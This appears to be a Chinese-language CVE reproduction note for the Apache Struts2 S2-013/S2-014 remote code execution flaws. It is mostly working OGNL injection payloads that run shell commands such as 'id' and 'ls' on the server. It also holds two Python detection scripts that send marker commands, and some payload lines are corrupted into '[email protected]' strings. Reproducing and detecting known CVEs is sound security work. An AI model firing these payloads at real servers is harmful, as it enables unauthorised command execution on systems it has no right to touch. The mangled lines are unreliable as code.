cve复现

S2-013_S2-014远程代码执行漏洞

S2-013/S2-014 远程代码执行漏洞

利用条件

structs2 版本: 2.0.0 - 2.3.14.1

利用脚本

s2-013

1
2
3
4
5
link.action?xxx=${(#_memberAccess["allowStaticMethodAccess"]=true,#[email protected]@getRuntime().exec('id').getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[50000],#c.read(#d),#[email protected]@getResponse().getWriter(),#out.println(#d),#out.close())}

// 或

link.action?xxx=${#_memberAccess["allowStaticMethodAccess"]=true,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream())}

s2-014

1
http://localhost:8080/S2-013/link.action?xxxx=${(#context['xwork.MethodAccessor.denyMethodExecution']=false)(#_memberAccess['allowStaticMethodAccess']=true)(@java.lang.Runtime@getRuntime().exec("ls"))}

检测脚本

S2-013

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
import requests

def poc(url):
    url+='''/link.action'''
    data={
        'xxx':'''${(#_memberAccess["allowStaticMethodAccess"]=true,#[email protected]@getRuntime().exec('echo structs2_s2-013_vuln_checkflag').getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[50000],#c.read(#d),#[email protected]@getResponse().getWriter(),#out.println(#d),#out.close())}'''
    }
    try :
        res=requests.get(url,params=data,proxies={"http":"http://127.0.0.1:8080"})
        if "structs2_s2-013_vuln_checkflag" in res.text and res.status_code==200:
            return True
    except :
        pass
    return False

S2-014

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
import requests

def poc(url):
    url+='''/link.action'''
    data={
        'xxx':'''${(#context['xwork.MethodAccessor.denyMethodExecution']=false)(#_memberAccess['allowStaticMethodAccess']=true)(@java.lang.Runtime@getRuntime().exec("echo structs2_s2-014_vuln_checkflag"))}'''
    }
    try :
        res=requests.get(url,params=data,proxies={"http":"http://127.0.0.1:8080"})
        if "structs2_s2-014_vuln_checkflag" in res.text and res.status_code==200:
            return True
    except :
        pass
    return False

参考

https://github.com/vulhub/vulhub/blob/master/struts2/s2-013/README.zh-cn.md